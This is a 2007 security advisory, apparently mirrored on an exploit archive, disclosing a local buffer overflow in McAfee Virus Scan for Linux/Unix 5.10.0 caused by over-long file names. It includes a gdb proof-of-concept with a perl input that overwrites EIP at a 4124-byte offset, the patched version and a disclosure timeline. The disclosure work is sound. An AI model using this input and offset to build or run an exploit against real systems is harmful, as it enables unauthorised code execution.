exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mcafee-advisory-08-2007.txt

mcafee-advisory-08-2007.txt
Posted Aug 16, 2007
Authored by Sebastian Wolfgarten | Site devtarget.org

A buffer overflow exists in McAfee Virus Scan for Linux and Unix version 5.10.0 that may allow for code execution in the context of the uid running it.

tags | advisory, overflow, code execution, virus
systems | linux, unix
SHA-256 | 653a20317b4d712bb76a36628d0b5713e8e22a2efbfa964476c159add50fc888

mcafee-advisory-08-2007.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I - TITLE

Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local
Buffer Overflow

II - SUMMARY

Description: Local buffer overflow vulnerability in McAfee Virus Scan
for Linux and Unix allows arbitrary code execution

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)

Date: August 15th, 2007

Severity: Low-Medium

References: http://www.devtarget.org/mcafee-advisory-08-2007.txt

III - OVERVIEW

McAfee Virus Scan for Linux and Unix is a command-line version of the
popular McAfee anti-virus scanner running on the Linux operating system
as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was
discovered that the product is prone to a classic buffer overflow
vulnerability when attempting to scan files or directories with a
particularly long name. This vulnerability results in the local
execution of arbitrary code with the privileges of the user running the
scanner, privilege escalation is by default not possible. Remote
exploitation appears to be infeasible due to file length limitations in
popular file systems.

IV - DETAILS

The overflow occurs when the product tries to scan a file or directory
with a name that is longer than a certain size (approx. 4124+ bytes).
For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to
successfully overwrite the EIP register and thus execute arbitrary code:

# /usr/local/uvscan/uvscan --version
Virus Scan for Linux v5.10.0
Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
(408) 988-3832 EVALUATION COPY - May 26 2006

Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006
Scanning for 194376 viruses, trojans and variants.

# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions. There is
absolutely no warranty for GDB. Type "show warranty" for details. This
GDB was configured as "i386-linux"...(no debugging symbols found)
Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 .
"B"x4'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1080238208 (LWP 2461)]
0x42424242 in ?? ()
(gdb) info registers
eax 0x1 1
ecx 0x8068430 134644784
edx 0x1 1
ebx 0x41414141 1094795585
esp 0xbfffdc40 0xbfffdc40
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x42424242 0x42424242
eflags 0x282 642
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

V - EXPLOIT CODE

An exploit for this vulnerability has been developed but will not
released to the general public at this time.

VI - WORKAROUND/FIX

To address this problem, the vendor has released McAfee VirusScan
Command Line Scanner for Linux and Unix version 5.20. Thus all users of
the product are asked to test and install this patch as soon as
possible. McAfee has also published a dedicated security bulletin that
covers the problem (see
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).


VII - DISCLOSURE TIMELINE

18. December 2006 - Notified security@mcafee.com
19. December 2006 - Vendor responded that vulnerability is being
investigated
19. December to 15. August 2007 - Weekly vendor report on the progress
of the development of the patch
01. August 2007 - Release of patch
15. August 2007 - Public disclosure


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwvgWd8QFWG1Rza8RAjyeAKC6zp+l6CwLw6/eQ80c6CDue4DpUwCdHtS9
pUdSpbqcZz1QkpM/YDc0dN4=
=PUZy
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close